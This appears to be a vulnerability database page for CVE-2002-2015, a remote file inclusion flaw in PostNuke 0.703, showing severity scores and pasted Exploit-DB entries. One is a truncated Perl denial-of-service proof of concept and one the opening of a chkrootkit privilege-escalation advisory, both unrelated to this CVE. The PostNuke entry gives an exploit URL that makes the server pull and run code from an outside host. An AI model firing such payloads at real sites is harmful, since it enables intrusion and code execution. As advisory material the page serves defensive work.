CVE-2002-2015
published 2002-12-31CVE-2002-2015: PHP file inclusion vulnerability in user.php in PostNuke 0.703 allows remote attackers to include arbitrary files and possibly execute code via the caselist…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.49%
94.8th percentile
PHP file inclusion vulnerability in user.php in PostNuke 0.703 allows remote attackers to include arbitrary files and possibly execute code via the caselist parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| postnuke_software_foundation | postnuke | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
exploitdb·2015-09-06
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
ActiveState Perl.exe x64 Client 5.20.2 - Crash (PoC)
---
# Exploit Title: [ActiveState] Perl.exe x64 Client Denial of Service (v5.20.2)
# Date: 9-3-2015
# Software Link: http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.20.2.2002/ActivePerl-5.20.2.2002-MSWin32-x64-299195.msi
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target(s): Windows 7, Server 2008, server 2012, Windows 8.1, Windows 10
# CVE:
# Category: Denial of Service Exploits
#
# Description:
# A Denial of Service can be achieved by concatenating several large strings together and attempting to write to file.
my $buff = "\x41" x 7000;
my $endofbuff = "\x42" x 5860;
open(myfile,'>orgsched.ocf'); # file extension is irrelevant
pri
Exploit-DB
Chkrootkit 0.49 - Local Privilege Escalation
exploitdb·2014-06-28
CVE-2014-0476 Chkrootkit 0.49 - Local Privilege Escalation
Chkrootkit 0.49 - Local Privilege Escalation
---
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port=
if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] &&
Exploit-DB
PostNuke 0.703 - caselist Arbitrary Module Include
exploitdb·2002-03-28
CVE-2002-2015 PostNuke 0.703 - caselist Arbitrary Module Include
PostNuke 0.703 - caselist Arbitrary Module Include
---
source: https://www.securityfocus.com/bid/4381/info
PostNuke is a content management system originally forked from the PHP-Nuke project. It is implemented in PHP, and available for Windows, Linux and other Unix based systems.
A vulnerability has been reported in some versions of PostNuke. Reportedly, it is possible to force the script user.php to include arbitrary modules. These files may be hosted remotely and contain arbitrary code, which will then be executed by the vulnerable system.
Other versions of PostNuke may share this vulnerability. This has not, however, been confirmed.
http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host
http://archives.neohapsis.com/archives/bugtraq/2002-03/0345.htmlhttp://www.iss.net/security_center/static/8699.phphttp://www.securityfocus.com/bid/4381http://archives.neohapsis.com/archives/bugtraq/2002-03/0345.htmlhttp://www.iss.net/security_center/static/8699.phphttp://www.securityfocus.com/bid/4381
2002-12-31
Published